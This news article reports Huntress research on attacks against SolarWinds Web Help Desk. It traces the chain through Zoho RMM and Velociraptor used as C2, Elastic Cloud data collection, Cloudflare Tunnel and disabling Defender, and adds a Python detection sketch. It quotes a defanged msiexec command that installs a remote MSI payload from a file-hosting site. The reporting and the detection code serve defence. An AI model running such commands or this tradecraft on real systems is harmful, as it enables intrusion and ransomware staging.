Security researchers warn of active attacks on SolarWinds Web Help Desk. Malicious actors are exploiting vulnerabilities to infiltrate systems and then deploy forensic tools as command-and-control infrastructure. The attack chain ends with preparing systems for ransomware deployment.
Huntress researchers observed attacks originating from a compromised SolarWinds Web Help Desk instance last week. The attack chain started with wrapper.exe, the WHD service wrapper, which launched java.exe. The Java process then launched cmd.exe to silently install an external MSI payload via the command msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi.
The attacker used Catbox to deploy a Zoho ManageEngine RMM agent. This legitimate remote management tool is often abused to gain access to compromised environments. The Zoho Assist agent was configured for unattended access, registering the compromised host with a Zoho Assist account linked to the Proton Mail address esmahyft@proton[.]me.
From RMM to forensic tools
Immediately after installing the RMM agent, the attacker began hands-on keyboard activity. Through the RMM agent process (TOOLSIQ.EXE), the attacker executed Active Directory discovery commands to inventory machines.
Shortly after the initial reconnaissance, the threat actor deployed Velociraptor on the compromised host. This open-source digital forensics and incident response tool was installed via a silent MSI execution from an attacker-controlled Supabase storage bucket.
Velociraptor is designed to assist defenders with endpoint monitoring and artifact collection. However, its remote command execution and process execution features, driven by VQL queries, make it just as effective as a C2 framework when the agent is pointed at attacker-controlled infrastructure.
Infrastructure with recognizable patterns
The attacker used Velociraptor version 0.73.4, an outdated version known to have a privilege-escalation vulnerability that has also been observed in previous campaigns. The Velociraptor server URL uses a Cloudflare Worker from the same Cloudflare account that was previously seen in multiple intrusions involving ToolShell exploitation and Warlock ransomware deployment.
With the Velociraptor agent installed as a Windows service, the attacker began executing a rapid series of encoded PowerShell commands. This pattern is consistent with Velociraptor’s standard method for executing PowerShell on endpoints, where commands are base64-encoded (UTF-16LE) to avoid issues with special characters.
Elastic Cloud as victim management dashboard
During the initial reconnaissance process, the attacker executed a PowerShell script that collected extensive system information and sent it directly to an attacker-controlled Elastic Cloud instance. The script runs the PowerShell cmdlet Get-ComputerInfo, which returns detailed system information, including OS version, hardware specifications, domain membership, and installed hotfixes.
The data is then formatted as NDJSON and pushed to an Elasticsearch systeminfo index via the Bulk API with a hardcoded API key. Using Elastic Cloud as a data collection backend is a notable tradecraft choice. The attacker has essentially built their own SIEM with Elastic. Each compromised system reports its full system profile to a centralized Elasticsearch instance that the operator can search at scale via Kibana.
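The process-creation patterns described above (a silent msiexec install from a remote URL, Velociraptor spawning base64/UTF-16LE encoded PowerShell, and a system-profile collection via Get-ComputerInfo) can be triaged from endpoint telemetry. The following is an added detection sketch, not code from the Huntress report; the sample events, the URL and the agent process name Velociraptor.exe are constructed assumptions.

```python
import base64
import binascii
import re

# Constructed sample process-creation events (not from the report). The base64 blob is
# built here from a known plaintext so the decoder can be verified against it.
_ENCODED = base64.b64encode("Get-ComputerInfo | ConvertTo-Json".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent": "java.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c msiexec /q /i https://example.invalid/tmp.msi"},
    {"parent": "Velociraptor.exe", "image": "powershell.exe",  # agent name is an assumption
     "cmdline": f"powershell.exe -NoProfile -EncodedCommand {_ENCODED}"},
    {"parent": "explorer.exe", "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_ENC_FLAG = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline):
    """Return the UTF-16LE plaintext behind -EncodedCommand, or None if absent or undecodable."""
    m = _ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def is_silent_remote_msi(cmdline):
    """True when msiexec is asked for a quiet install (/q, /qn, /qb) of an http(s) URL."""
    low = cmdline.lower()
    return "msiexec" in low and all(re.search(p, low) for p in (r"\s/q(?:n|b)?\b", r"\s/i\s+https?://"))


def triage(event):
    """Return the list of finding tags raised by one process-creation event."""
    findings = []
    if is_silent_remote_msi(event["cmdline"]):
        findings.append("silent_remote_msi_install")
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        findings.append("encoded_powershell")
        if "get-computerinfo" in decoded.lower():
            findings.append("system_profile_collection")
    if event["parent"].lower() == "velociraptor.exe" and event["image"].lower() == "powershell.exe":
        findings.append("velociraptor_spawned_powershell")
    return findings


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["image"], triage(ev))
```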
The attacker then installed Cloudflare Tunnel directly from the official GitHub release URL. This adds a second, tunnel-based channel alongside the existing Velociraptor C2 connection.
After approximately 84 seconds, the attacker disabled security controls via registry changes. About a second after disabling Defender, the attacker downloaded a new copy of the VS Code binary from a Supabase bucket.